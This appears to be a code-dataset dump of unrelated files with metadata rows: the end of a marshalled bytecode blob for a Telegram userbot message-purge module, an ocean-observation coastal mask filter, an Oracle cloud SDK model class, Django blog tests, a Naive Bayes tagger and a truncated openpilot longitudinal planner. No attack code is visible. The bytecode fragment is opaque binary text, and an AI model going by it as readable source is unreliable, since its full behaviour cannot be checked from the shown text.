kenangan....r\n\x00\x00\x00)\x0b\xda\x04text\xda\x03intr\x0c\x00\x00\x00r\r\x00\x00\x00r\x13\x00\x00\x00r\x15\x00\x00\x00r\x12\x00\x00\x00r\x14\x00\x00\x00r\x04\x00\x00\x00r\x05\x00\x00\x00r\x02\x00\x00\x00)\x05\xda\x05delme\xda\x07messager\x17\x00\x00\x00\xda\x01i\xda\x04smsgr\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x07purgeme2\x00\x00\x00s,\x00\x00\x00\x00\x03\x06\x01\x10\x01\x04\x02\n\x01\x02\xff\x12\x02\x0c\x01\x04\x01\x08\x01\x12\x02\x06\x01\x04\x01\x0e\xfe\n\x04\x04\x01\x06\x01\x02\x01\x0e\xfe\n\x03\x0e\x01\x04\x01r$\x00\x00\x00z\x06^.del$c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00\xc3\x00\x00\x00s\x80\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x00j\x01r|z8|\x01\xa0\x02\xa1\x00I\x00d\x01H\x00\x01\x00|\x00\xa0\x02\xa1\x00I\x00d\x01H\x00\x01\x00t\x03rJ|\x00j\x04\xa0\x05t\x06d\x02\xa1\x02I\x00d\x01H\x00\x01\x00W\x00n.\x04\x00t\x07j\x08k\nrz\x01\x00\x01\x00\x01\x00t\x03rv|\x00j\x04\xa0\x05t\x06d\x03\xa1\x02I\x00d\x01H\x00\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x04z/ For .del command, delete the replied message. Nz"Deletion of message was successfulz\x1eWell, I can\'t delete a message)\tZ\x11get_reply_messager\x0e\x00\x00\x00r\x15\x00\x00\x00r\x04\x00\x00\x00r\x0c\x00\x00\x00r\x12\x00\x00\x00r\x05\x00\x00\x00r\x03\x00\x00\x00Z\x0fBadRequestError)\x02r \x00\x00\x00Z\x07msg_srcr\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\tdelete_itM\x00\x00\x00s \x00\x00\x00\x00\x03\x0e\x01\x06\x01\x02\x01\x0e\x01\x0e\x01\x04\x01\x06\x01\x02\x00\x02\xff\x0e\x02\x10\x01\x04\x01\x06\x01\x02\x00\x02\xffr%\x00\x00\x00z\x06^.editc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\xa6\x00\x00\x00|\x00j\x00}\x01|\x00\xa0\x01\xa1\x00I\x00d\x01H\x00}\x02|\x00j\x02\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00}\x03t\x04|\x01d\x03d\x01\x85\x02\x19\x00\x83\x01}\x04d\x04}\x05|\x00j\x02\xa0\x05|\x02|\x03\xa1\x022\x00z>3\x00d\x01H\x00W\x00}\x01|\x05d\x05k\x02r~|\x01\xa0\x06|\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x07\xa1\x00I\x00d\x01H\x00\x01\x00\x01\x00q\x8a|\x05d\x04\x17\x00}\x05qH6\x00t\x08r\xa2|\x00j\x02\xa0\tt\nd\x06\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x07z. For .editme command, edit your last message. Nr\x1d\x00\x00\x00\xe9\x06\x00\x00\x00r\x08\x00\x00\x00r\n\x00\x00\x00z$Edit query was executed successfully)\x0br\x1e\x00\x00\x00r\x0b\x00\x00\x00r\x0c\x00\x00\x00Z\x0bget_peer_idr\x14\x00\x00\x00r\r\x00\x00\x00r\x11\x00\x00\x00r\x15\x00\x00\x00r\x04\x00\x00\x00r\x12\x00\x00\x00r\x05\x00\x00\x00)\x06r\x11\x00\x00\x00r!\x00\x00\x00r\x16\x00\x00\x00Z\x07self_idZ\x06stringr"\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x06editer^\x00\x00\x00s\x1e\x00\x00\x00\x00\x03\x06\x01\x0e\x01\x12\x01\x10\x01\x04\x01\x1a\x01\x08\x01\x10\x01\x0e\x01\x04\x01\x0c\x01\x04\x01\x08\x01\x02\xffr\'\x00\x00\x00z\x04^.sdc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s\x84\x00\x00\x00|\x00j\x00}\x01t\x01|\x01d\x01d\x02\x85\x02\x19\x00\x83\x01}\x02t\x02|\x00j\x00d\x02d\x03\x85\x02\x19\x00\x83\x01}\x03|\x00\xa0\x03\xa1\x00I\x00d\x03H\x00\x01\x00|\x00j\x04\xa0\x05|\x00j\x06|\x03\xa1\x02I\x00d\x03H\x00}\x04t\x07|\x02\x83\x01I\x00d\x03H\x00\x01\x00|\x04\xa0\x03\xa1\x00I\x00d\x03H\x00\x01\x00t\x08r\x80|\x00j\x04\xa0\x05t\td\x04\xa1\x02I\x00d\x03H\x00\x01\x00d\x03S\x00)\x05z4 For .sd command, make seflf-destructable messages. \xe9\x04\x00\x00\x00r&\x00\x00\x00Nz\x1asd query done successfully)\nr\x1e\x00\x00\x00r\x1f\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x0c\x00\x00\x00r\x12\x00\x00\x00r\x13\x00\x00\x00r\x02\x00\x00\x00r\x04\x00\x00\x00r\x05\x00\x00\x00)\x05Z\x07destroyr!\x00\x00\x00Z\x07counterr\x1e\x00\x00\x00r#\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x0cselfdestructq\x00\x00\x00s\x16\x00\x00\x00\x00\x03\x06\x01\x10\x01\x12\x01\x0e\x01\x16\x01\x0e\x01\x0e\x01\x04\x01\x08\x01\x02\xffr)\x00\x00\x00Z\x08messagesax\x01\x00\x00`.purge`\nUsage: Purges all messages starting from the reply.\n\n`.purgeme` <x>\nusage: Deletes x amount of your latest messages..\n\n`.del`\nUsage: Deletes the message you replied to.\n\n`.edit`\nUsage: Replace your last message with <newmessage>.\n\n`.sd `<x> <message>\nUsage: Creates a message that selfdestructs in x seconds.\nKeep the seconds under 100 since it puts your bot to sleepN)\x11\xda\x07__doc__Z\x07asyncior\x02\x00\x00\x00Z\x0ftelethon.errorsr\x03\x00\x00\x00Z\x07userbotr\x04\x00\x00\x00r\x05\x00\x00\x00r\x06\x00\x00\x00Z\x0euserbot.eventsr\x07\x00\x00\x00r\x1b\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r\'\x00\x00\x00r)\x00\x00\x00\xda\x06updater\x19\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x08<module>\x06\x00\x00\x00s$\x00\x00\x00\x04\x02\x0c\x02\x0c\x02\x14\x01\x0c\x03\n\x01\n!\n\x01\n\x1a\n\x01\n\x10\n\x01\n\x12\n\x01\n\x0e\x04\x01\x02\x01\x02\xfe')) | 2,149.25 | 8,526 | 0.762824 |
62be4516ddb55b3d98c8d6d7661a9c0dd9b1352f | 1,560 | py | Python | pyromsobs/extraCoastMask.py | metno/pyromsobs | 8479a13908797a5e7370f272a3462b7c6d59e45e | [
"MIT"
] | null | null | null | pyromsobs/extraCoastMask.py | metno/pyromsobs | 8479a13908797a5e7370f272a3462b7c6d59e45e | [
"MIT"
] | null | null | null | pyromsobs/extraCoastMask.py | metno/pyromsobs | 8479a13908797a5e7370f272a3462b7c6d59e45e | [
"MIT"
] | 1 | 2019-05-24T08:53:28.000Z | 2019-05-24T08:53:28.000Z | from .OBSstruct import OBSstruct
from .utils import setDimensions
from netCDF4 import Dataset
import numpy as np
def inds(ps):
if (np.floor(ps) == np.ceil(ps)):
ind = [ps.astype(int)]
else:
ind = [np.floor(ps).astype(int), np.ceil(ps).astype(int)]
return ind
def masked(var):
if np.ma.is_masked(var):
nans = var.mask
else:
nans = np.isnan(var)
notnans = np.logical_not(nans)
return nans, notnans
def extraCoastMask(S, hisfile, ngrdpts=0):
'''
This function apply an extra check to filter out observations close to the coast.
ngrdpts sets the number of grid points away from the observations where we
can tolerate land
'''
if not isinstance(S,OBSstruct):
fid = Dataset(S)
OBS = OBSstruct(fid)
else:
OBS=OBSstruct(S)
fid = Dataset(hisfile)
mask = fid.variables['mask_rho'][:]
J, I = mask.shape
fid.close()
for n in range(OBS.Ndatum):
i = inds(OBS.Xgrid[n])
j = inds(OBS.Ygrid[n])
i.extend([min(i) - ngrdpts, max(i) + ngrdpts])
j.extend([min(j) - ngrdpts, max(j) + ngrdpts])
varval = mask[max(0,min(j)): min(J, max(j)+1),max(0,min(i)): min(I, max(i)+1) ]
varval = np.ma.array(varval, mask = varval-1) # This will mask values of 0
nans, notnans = masked(varval)
if any(nans.ravel()):
# if any masked grid in search area, set value to nan
OBS.value[n] = np.nan
# Return only finite OBS.values
return OBS[np.isfinite(OBS.value)]
| 28.363636 | 87 | 0.601923 |
41debf2826f4ad6a904e296c7ae6e4238e050c08 | 8,045 | py | Python | src/oci/core/models/create_cluster_network_instance_pool_details.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | 3 | 2020-09-10T22:09:45.000Z | 2021-12-24T17:00:07.000Z | src/oci/core/models/create_cluster_network_instance_pool_details.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/core/models/create_cluster_network_instance_pool_details.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateClusterNetworkInstancePoolDetails(object):
"""
The data to create an instance pool in a cluster network.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateClusterNetworkInstancePoolDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param defined_tags:
The value to assign to the defined_tags property of this CreateClusterNetworkInstancePoolDetails.
:type defined_tags: dict(str, dict(str, object))
:param display_name:
The value to assign to the display_name property of this CreateClusterNetworkInstancePoolDetails.
:type display_name: str
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateClusterNetworkInstancePoolDetails.
:type freeform_tags: dict(str, str)
:param instance_configuration_id:
The value to assign to the instance_configuration_id property of this CreateClusterNetworkInstancePoolDetails.
:type instance_configuration_id: str
:param size:
The value to assign to the size property of this CreateClusterNetworkInstancePoolDetails.
:type size: int
"""
self.swagger_types = {
'defined_tags': 'dict(str, dict(str, object))',
'display_name': 'str',
'freeform_tags': 'dict(str, str)',
'instance_configuration_id': 'str',
'size': 'int'
}
self.attribute_map = {
'defined_tags': 'definedTags',
'display_name': 'displayName',
'freeform_tags': 'freeformTags',
'instance_configuration_id': 'instanceConfigurationId',
'size': 'size'
}
self._defined_tags = None
self._display_name = None
self._freeform_tags = None
self._instance_configuration_id = None
self._size = None
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateClusterNetworkInstancePoolDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this CreateClusterNetworkInstancePoolDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateClusterNetworkInstancePoolDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this CreateClusterNetworkInstancePoolDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def display_name(self):
"""
Gets the display_name of this CreateClusterNetworkInstancePoolDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:return: The display_name of this CreateClusterNetworkInstancePoolDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this CreateClusterNetworkInstancePoolDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:param display_name: The display_name of this CreateClusterNetworkInstancePoolDetails.
:type: str
"""
self._display_name = display_name
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateClusterNetworkInstancePoolDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this CreateClusterNetworkInstancePoolDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateClusterNetworkInstancePoolDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this CreateClusterNetworkInstancePoolDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def instance_configuration_id(self):
"""
**[Required]** Gets the instance_configuration_id of this CreateClusterNetworkInstancePoolDetails.
The `OCID`__ of the instance configuration
associated with the instance pool.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The instance_configuration_id of this CreateClusterNetworkInstancePoolDetails.
:rtype: str
"""
return self._instance_configuration_id
@instance_configuration_id.setter
def instance_configuration_id(self, instance_configuration_id):
"""
Sets the instance_configuration_id of this CreateClusterNetworkInstancePoolDetails.
The `OCID`__ of the instance configuration
associated with the instance pool.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param instance_configuration_id: The instance_configuration_id of this CreateClusterNetworkInstancePoolDetails.
:type: str
"""
self._instance_configuration_id = instance_configuration_id
@property
def size(self):
"""
**[Required]** Gets the size of this CreateClusterNetworkInstancePoolDetails.
The number of instances that should be in the instance pool.
:return: The size of this CreateClusterNetworkInstancePoolDetails.
:rtype: int
"""
return self._size
@size.setter
def size(self, size):
"""
Sets the size of this CreateClusterNetworkInstancePoolDetails.
The number of instances that should be in the instance pool.
:param size: The size of this CreateClusterNetworkInstancePoolDetails.
:type: int
"""
self._size = size
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 36.076233 | 245 | 0.679553 |
2ffa019eae1bcff0b84cfb07b851396a82e83b8b | 959 | py | Python | DjangoBlog/tests.py | rokuuu1999/NewBrainss | 1b0da2fbd1a59db960f05f04f022b033caa4b3bc | [
"MIT"
] | null | null | null | DjangoBlog/tests.py | rokuuu1999/NewBrainss | 1b0da2fbd1a59db960f05f04f022b033caa4b3bc | [
"MIT"
] | null | null | null | DjangoBlog/tests.py | rokuuu1999/NewBrainss | 1b0da2fbd1a59db960f05f04f022b033caa4b3bc | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from django.test import Client, RequestFactory, TestCase
from blog.models import Article, Category, Tag
from django.contrib.auth import get_user_model
from DjangoBlog.utils import get_current_site
from django.urls import reverse
import datetime
from DjangoBlog.utils import *
class DjangoBlogTest(TestCase):
def setUp(self):
pass
def test_utils(self):
md5 = get_md5('test')
self.assertIsNotNone(md5)
c = CommonMarkdown.get_markdown(
)
self.assertIsNotNone(c)
d = {
'd': 'key1',
'd2': 'key2'
}
data = parse_dict_to_url(d)
self.assertIsNotNone(data)
render = BlogMarkDownRenderer()
s = render.autolink('http://www.baidu.com')
self.assertTrue(s.find('nofollow') > 0)
s = render.link('http://www.baidu.com', 'test', 'test')
self.assertTrue(s.find('nofollow') > 0)
| 25.918919 | 63 | 0.632951 |
e9cb72d249affc5dc4dff5a4085b1a63524a35b3 | 6,820 | py | Python | Han-Ji/naive_bayes/Naive.py | jibanCat/DigitalHumanities | 256ad9fa8eba98565fbfb33e25ed045ad42767fc | [
"MIT"
] | 1 | 2021-06-03T20:53:18.000Z | 2021-06-03T20:53:18.000Z | Han-Ji/naive_bayes/Naive.py | jibanCat/DigitalHumanities | 256ad9fa8eba98565fbfb33e25ed045ad42767fc | [
"MIT"
] | null | null | null | Han-Ji/naive_bayes/Naive.py | jibanCat/DigitalHumanities | 256ad9fa8eba98565fbfb33e25ed045ad42767fc | [
"MIT"
] | 1 | 2018-05-22T09:18:21.000Z | 2018-05-22T09:18:21.000Z | import sys
import os
import re
import numpy as np
import pandas as pd
from collections import defaultdict
class NaiveBayes:
"""
A NaiveBayes class designed for calculate the probability of a
specific type of tags (time, place, person names, etc).
It is currently only able to calculate the probability for one sentence a
a time.
Also noted that I use hard-coded definition of likelihood tables to
calculate the posterior. Users are expected to use their domain knowledge
to decide the likelihoods based on whatever methods.
I followed a similar way for using Bayes rule as in
<How to Write a Spelling Corrector: https://norvig.com/spell-correct.html>
Args:
names (list) : a list of feature names.
iterables (list) : a list of iterables corresponding to feature names.
likelihoods (list) : a list of probabilities corresponding to feature names.
prior (float) : a prior probability associated with the type of tag you want to calssify.
"""
def __init__(self, names=[], iterables=[], likelihoods=[], prior=0.5, filename=None):
self.prior = prior
self.feature_vector = defaultdict(int)
self.definition_dict = self._convert2def(names, iterables, likelihoods)
if filename != None and os.path.exists(filename):
self.load_json(filename)
self.feature_vector_init()
self.likelihood_init()
self.iterable_init()
def feature_vector_init(self):
try:
for feature_dict in self.definition_dict['data']:
self.feature_vector[feature_dict['name']] = 0
except KeyError as e:
print('[Warning] No avaliable features currently.', e)
def likelihood_init(self):
self.likelihoods = { x['name']: x['likelihood'] for x in self.definition_dict['data'] }
def iterable_init(self):
self.iterables = { x['name']: x['iterable'] for x in self.definition_dict['data'] }
def prior_init(self):
# pior is freq of features
self.prior_list = defaultdict(float)
def _convert2def(self, names, iterables, likelihoods):
'''
convert 3 lists, names, iterables, and likelihoods into definition dictionary.
Definition dict policy:
definition_dict = {
"data" : [
{'name' : "數字",
'iterables': "是元正𨳝一二三四五六七八九十廿卅",
'likelihood': 0.6},
],
"columns" : [
{"name" : '(str) use few chars to represent the feature name',
"iterables": '(str, or any iterable) any iterable can be iterated',
"likelihood": '(float) the independent prob of the feature'}
]
}
'''
definition_dict = {
"data" : [],
"columns" : {
"name" : '(str) use few chars to represent the feature name',
"iterable": '(str, or any iterable) any iterable can be iterated',
"likelihood": '(float) the independent prob of the feature'}
}
for name,iterable,likelihood in zip(names,iterables,likelihoods):
definition_dict['data'].append(
{"name" : name,
"iterable" : iterable,
"likelihood" : likelihood}
)
return definition_dict
def load_json(self, filename):
import json
with open(filename, "r", encoding="utf-8") as file:
self.definition_dict = json.load(file)
def to_json(self, filename):
import json
with open(filename, "w", encoding="utf-8") as file:
json.dump(self.definition_dict, file)
def load(self, definition):
'''
Loading definition from a json file,
a definition is a table to define feature vectors and priors.
'''
self.definition_dict = definition
self.prior_init()
self.prior_list
def fit(self, Xtrain, Ytrain):
'''
Auto-extract a feature vector from a given document (str),
Note: I have no idea currently ...
'''
self.feature_vector
def predict(self, X):
return np.array([
self.predict
])
def predict_phrase(self, phrase):
'''
Predict a single phrase
'''
return np.round( self.calc_posterior(phrase) )
def calc_posterior(self, phrase, regularize=None):
'''
Clac the posterior based on Bayes rule.
Args:
phrase (str) : the phrase you want to calc the naive bayes probability.
regularize (float, default None) : if float, using this number as
punishment for irrelevant words
Returns:
prob (float) : the posterior probability of phrase being classified
'''
self.feature_vector_init()
self.update_feature_vector(phrase, regularize=regularize)
return self._calc_bayes_rule_iid(self.feature_vector, self.likelihoods, self.prior)
def _calc_bayes_rule_iid(self, feature_vector, likelihood, prior):
"""Calc the posterior using bayes theorem.
The assumption here is the naive bayes, so the prob of features
are independent. The joint prob of likelihood is a prod of individual
feature prob."""
positive_likelihood = prior * np.prod([
likelihood[key]**hits for key, hits in feature_vector.items()
])
negative_likelihood = (1 - prior) * np.prod([
(1 - likelihood[key])**hits for key, hits in feature_vector.items()
])
# Bayes theorem
posterior = positive_likelihood / (positive_likelihood + negative_likelihood)
return posterior
def update_feature_vector(self, phrase, regularize=None):
"""
update the feature vector based on the list of features and a given phrase and
a given feature name.
Args:
phrase (str) : the phrase you want to calc the naive bayes probability.
regularize (float, default None) : if float, using this number as
punishment for irrelevant words
"""
matched_words = set([])
for name in self.iterables.keys():
for x in self.iterables[name]:
if x in phrase:
self.feature_vector[name] += 1
matched_words.add(x)
if type(regularize) == float:
self.likelihoods['irrelevant'] = regularize
self.feature_vector['irrelevant'] = len(re.sub(
r"[{}]".format(''.join(matched_words)), r"", phrase
)) if len(matched_words) > 0 else len(phrase)
| 36.470588 | 97 | 0.595015 |
14fd3f7251f2a9bd5b958b7cbbd76bd2c8b715f1 | 15,566 | py | Python | selfdrive/controls/lib/longitudinal_planner.py | DS1SQM/OPKR085test_210525 | 787fd16a20782e31d3430a71a50207dc844c3152 | [
"MIT"
] | null | null | null | selfdrive/controls/lib/longitudinal_planner.py | DS1SQM/OPKR085test_210525 | 787fd16a20782e31d3430a71a50207dc844c3152 | [
"MIT"
] | null | null | null | selfdrive/controls/lib/longitudinal_planner.py | DS1SQM/OPKR085test_210525 | 787fd16a20782e31d3430a71a50207dc844c3152 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import math
from datetime import datetime
import time
import numpy as np
from common.params import Params
from common.numpy_fast import interp
import cereal.messaging as messaging
from cereal import car
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.speed_smoother import speed_smoother
from selfdrive.controls.lib.longcontrol import LongCtrlState
from selfdrive.controls.lib.fcw import FCWChecker
from selfdrive.controls.lib.long_mpc import LongitudinalMpc
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX
from selfdrive.controls.lib.long_mpc_model import LongitudinalMpcModel
LON_MPC_STEP = 0.2 # first step is 0.2s
AWARENESS_DECEL = -0.2 # car smoothly decel at .2m/s^2 when user is distracted
# lookup tables VS speed to determine min and max accels in cruise
# make sure these accelerations are smaller than mpc limits
#_A_CRUISE_MIN_V_FOLLOWING = [-3.5, -3.5, -3.5, -2.5, -1.5]
_A_CRUISE_MIN_V_FOLLOWING = [-2.7, -2.4, -2.1, -1.5, -0.5]
_A_CRUISE_MIN_V = [-1.0, -.8, -.67, -.5, -.30]
_A_CRUISE_MIN_BP = [ 0., 5., 10., 20., 40.]
# need fast accel at very low speed for stop and go
# make sure these accelerations are smaller than mpc limits
_A_CRUISE_MAX_V = [1.2, 1.2, 0.65, .4]
_A_CRUISE_MAX_V_FOLLOWING = [1.65, 1.65, 0.65, .4]
_A_CRUISE_MAX_BP = [0., 6.4, 22.5, 40.]
# Lookup table for turns
_A_TOTAL_MAX_V = [1.7, 3.2]
_A_TOTAL_MAX_BP = [20., 40.]
def calc_cruise_accel_limits(v_ego, following):
if following:
a_cruise_min = interp(v_ego, _A_CRUISE_MIN_BP, _A_CRUISE_MIN_V_FOLLOWING)
a_cruise_max = interp(v_ego, _A_CRUISE_MAX_BP, _A_CRUISE_MAX_V_FOLLOWING)
else:
a_cruise_min = interp(v_ego, _A_CRUISE_MIN_BP, _A_CRUISE_MIN_V)
a_cruise_max = interp(v_ego, _A_CRUISE_MAX_BP, _A_CRUISE_MAX_V)
return np.vstack([a_cruise_min, a_cruise_max])
def limit_accel_in_turns(v_ego, angle_steers, a_target, CP):
"""
This function returns a limited long acceleration allowed, depending on the existing lateral acceleration
this should avoid accelerating when losing the target in turns
"""
a_total_max = interp(v_ego, _A_TOTAL_MAX_BP, _A_TOTAL_MAX_V)
a_y = v_ego**2 * angle_steers * CV.DEG_TO_RAD / (CP.steerRatio * CP.wheelbase)
a_x_allowed = math.sqrt(max(a_total_max**2 - a_y**2, 0.))
return [a_target[0], min(a_target[1], a_x_allowed)]
class ModelMpcHelper:
def __init__(self):
self.model_t = [i ** 2 / 102.4 for i in range(33)] # the timesteps of the model predictions
self.mpc_t = list(range(10)) # the timesteps of what the LongMpcModel class takes in, 1 sec intervels to 10
self.model_t_idx = [sorted(range(len(self.model_t)), key=[abs(idx - t) for t in self.model_t].__getitem__)[0] for idx in self.mpc_t] # matches 0 to 9 interval to idx from t
assert len(self.model_t_idx) == 10, 'Needs to be length 10 for mpc'
def convert_data(self, sm):
modelV2 = sm['modelV2']
distances, speeds, accelerations = [], [], []
if not sm.alive['modelV2'] or len(modelV2.position.x) == 0:
return distances, speeds, accelerations
speeds = [modelV2.velocity.x[t] for t in self.model_t_idx]
distances = [modelV2.position.x[t] for t in self.model_t_idx]
for t in self.mpc_t: # todo these three in one loop
if 0 < t < 9:
accelerations.append((speeds[t + 1] - speeds[t - 1]) / 2)
# Extrapolate forward and backward at edges
accelerations.append(accelerations[-1] - (accelerations[-2] - accelerations[-1]))
accelerations.insert(0, accelerations[0] - (accelerations[1] - accelerations[0]))
return distances, speeds, accelerations
class Planner():
def __init__(self, CP):
self.CP = CP
self.mpc1 = LongitudinalMpc(1)
self.mpc2 = LongitudinalMpc(2)
self.mpc_model = LongitudinalMpcModel()
self.model_mpc_helper = ModelMpcHelper()
self.v_acc_start = 0.0
self.a_acc_start = 0.0
self.v_acc_next = 0.0
self.a_acc_next = 0.0
self.v_acc = 0.0
self.v_acc_future = 0.0
self.a_acc = 0.0
self.v_cruise = 0.0
self.a_cruise = 0.0
self.longitudinalPlanSource = 'cruise'
self.fcw_checker = FCWChecker()
self.path_x = np.arange(192)
self.fcw = False
self.params = Params()
self.first_loop = True
self.target_speed_map = 0.0
self.target_speed_map_counter = 0
self.target_speed_map_counter_check = False
self.target_speed_map_counter1 = 0
self.target_speed_map_counter2 = 0
self.target_speed_map_counter3 = 0
self.target_speed_map_dist = 0
self.target_speed_map_block = False
self.target_speed_map_sign = False
self.tartget_speed_offset = int(self.params.get("OpkrSpeedLimitOffset", encoding="utf8"))
self.vego = 0
def choose_solution(self, v_cruise_setpoint, enabled, model_enabled):
possible_futures = [self.mpc1.v_mpc_future, self.mpc2.v_mpc_future, v_cruise_setpoint]
if enabled:
solutions = {'cruise': self.v_cruise}
if self.mpc1.prev_lead_status:
solutions['mpc1'] = self.mpc1.v_mpc
if self.mpc2.prev_lead_status:
solutions['mpc2'] = self.mpc2.v_mpc
if self.mpc_model.valid and model_enabled:
solutions['model'] = self.mpc_model.v_mpc
possible_futures.append(self.mpc_model.v_mpc_future) # only used when using model
slowest = min(solutions, key=solutions.get)
self.longitudinalPlanSource = slowest
# Choose lowest of MPC and cruise
if slowest == 'mpc1':
self.v_acc = self.mpc1.v_mpc
self.a_acc = self.mpc1.a_mpc
elif slowest == 'mpc2':
self.v_acc = self.mpc2.v_mpc
self.a_acc = self.mpc2.a_mpc
elif slowest == 'cruise':
self.v_acc = self.v_cruise
self.a_acc = self.a_cruise
elif slowest == 'model':
self.v_acc = self.mpc_model.v_mpc
self.a_acc = self.mpc_model.a_mpc
self.v_acc_future = min(possible_futures)
def update(self, sm, CP):
"""Gets called when new radarState is available"""
cur_time = sec_since_boot()
v_ego = sm['carState'].vEgo
self.vego = v_ego
long_control_state = sm['controlsState'].longControlState
if CP.sccBus == 2:
v_cruise_kph = sm['carState'].vSetDis
else:
v_cruise_kph = sm['controlsState'].vCruise
force_slow_decel = sm['controlsState'].forceDecel
v_cruise_kph = min(v_cruise_kph, V_CRUISE_MAX)
v_cruise_setpoint = v_cruise_kph * CV.KPH_TO_MS
lead_1 = sm['radarState'].leadOne
lead_2 = sm['radarState'].leadTwo
enabled = (long_control_state == LongCtrlState.pid) or (long_control_state == LongCtrlState.stopping)
following = lead_1.status and lead_1.dRel < 45.0 and lead_1.vLeadK > v_ego and lead_1.aLeadK > 0.0
self.v_acc_start = self.v_acc_next
self.a_acc_start = self.a_acc_next
if self.params.get_bool("OpkrMapEnable"):
self.target_speed_map_counter += 1
if self.target_speed_map_counter >= (50+self.target_speed_map_counter1) and self.target_speed_map_counter_check == False:
self.target_speed_map_counter_check = True
os.system("logcat -d -s opkrspdlimit,opkrspd2limit | grep opkrspd | tail -n 1 | awk \'{print $7}\' > /data/params/d/LimitSetSpeedCamera &")
os.system("logcat -d -s opkrspddist | grep opkrspd | tail -n 1 | awk \'{print $7}\' > /data/params/d/LimitSetSpeedCameraDist &")
self.target_speed_map_counter3 += 1
if self.target_speed_map_counter3 > 2:
self.target_speed_map_counter3 = 0
os.system("logcat -c &")
elif self.target_speed_map_counter >= (75+self.target_speed_map_counter1):
self.target_speed_map_counter1 = 0
self.target_speed_map_counter = 0
self.target_speed_map_counter_check = False
mapspeed = self.params.get("LimitSetSpeedCamera", encoding="utf8")
mapspeeddist = self.params.get("LimitSetSpeedCameraDist", encoding="utf8")
if mapspeed is not None and mapspeeddist is not None:
mapspeed = int(float(mapspeed.rstrip('\n')))
mapspeeddist = int(float(mapspeeddist.rstrip('\n')))
if mapspeed > 29:
self.target_speed_map = mapspeed
self.target_speed_map_dist = mapspeeddist
if self.target_speed_map_dist > 1001:
